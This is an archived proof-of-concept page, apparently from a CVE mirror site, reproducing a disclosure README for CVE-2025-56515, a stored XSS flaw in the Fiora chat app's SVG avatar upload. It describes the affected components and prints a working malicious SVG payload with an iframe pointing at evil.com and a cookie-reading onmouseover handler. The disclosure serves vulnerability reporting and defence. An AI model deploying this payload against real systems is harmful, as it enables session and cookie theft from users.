Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-56515 PoC — Fiora 安全漏洞

Source
https://github.com/Kov404/CVE-2025-56515
Associated Vulnerability
Title:Fiora 安全漏洞 (CVE-2025-56515)
Description:File upload vulnerability in Fiora chat application 1.0.0 through user avatar upload functionality. The application fails to validate SVG file content, allowing malicious SVG files with embedded foreignObject elements containing iframe tags and JavaScript event handlers (onmouseover) to be uploaded and stored. When rendered, these SVG files execute arbitrary JavaScript, enabling attackers to steal user sessions, cookies, and perform unauthorized actions in the context of users viewing affected profiles.
Description
Cross-Site Scripting (XSS) Vulnerability in Fiora Chat Application
Readme
# CVE-2025-56515
Cross-Site Scripting (XSS) Vulnerability in Fiora Chat Application
# CVE-2025-56515: Cross-Site Scripting (XSS) Vulnerability in Fiora Chat Application

## Vulnerability Overview
**CVE ID**: CVE-2025-56515  
**Vulnerability Type**: Cross-Site Scripting (XSS)  
**Attack Type**: Remote  
**Impact**: Code Execution  
**Affected Product**: Fiora Chat Application (Version 1.0.0)  
**Vendor**: suisuijiang  
**Discoverer**: Kaio Mendonça Pereira  
**Vendor Confirmed**: Yes  
**References**:  
- [Fiora GitHub Repository](https://github.com/yinxin630/fiora)  
- [Fiora Application](https://fiora.suisuijiang.com/)  
- [CWE-79: Improper Neutralization of Input During Web Page Generation](https://cwe.mitre.org/data/definitions/79.html)

## Description
The Fiora chat application (version 1.0.0) is vulnerable to a Cross-Site Scripting (XSS) attack due to improper validation of SVG file content uploaded through the user avatar modification functionality. Authenticated users can upload malicious SVG files containing embedded `<foreignObject>` elements with `<iframe>` tags and JavaScript event handlers (e.g., `onmouseover`). When these SVG files are rendered in the browser, the embedded JavaScript executes, allowing attackers to steal user sessions, cookies, or perform unauthorized actions in the context of users viewing the affected profile.

## Affected Components
- `packages/server/src/routes/user.ts`
- `packages/web/src/modules/Sidebar/UserInfo.tsx`
- `packages/web/src/service.ts`
- `packages/web/src/components/Avatar.tsx`
- `/UserAvatar/` directory
- Function: `changeUserAvatar`

## Attack Vector
The vulnerability is exploited by uploading a malicious SVG file as a user avatar. The SVG file can include a `<foreignObject>` element containing an `<iframe>` with a JavaScript event handler, such as `onmouseover="alert(document.cookie)"`. When the avatar is rendered (e.g., on page reload or direct access to the SVG URL), the malicious JavaScript executes, bypassing the application's XSS protections. This enables attackers to perform actions such as:
- Stealing session cookies.
- Performing unauthorized actions in the context of the victim's session.
- Redirecting users to malicious sites.

### Example Malicious SVG Payload
```xml
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 100 100">
  <foreignObject x="0" y="0" width="100" height="100">
    <iframe xmlns="http://www.w3.org/1999/xhtml" src="https://evil.com" onmouseover="alert(document.cookie)" width="100" height="100"></iframe>
  </foreignObject>
  <text x="0" y="15"></text>
</svg>
File Snapshot

 [4.0K]  /data/pocs/1e0a43dae7e0298dbf896b73e85442ad13f67f37
└── [2.6K]  README.md

1 directory, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →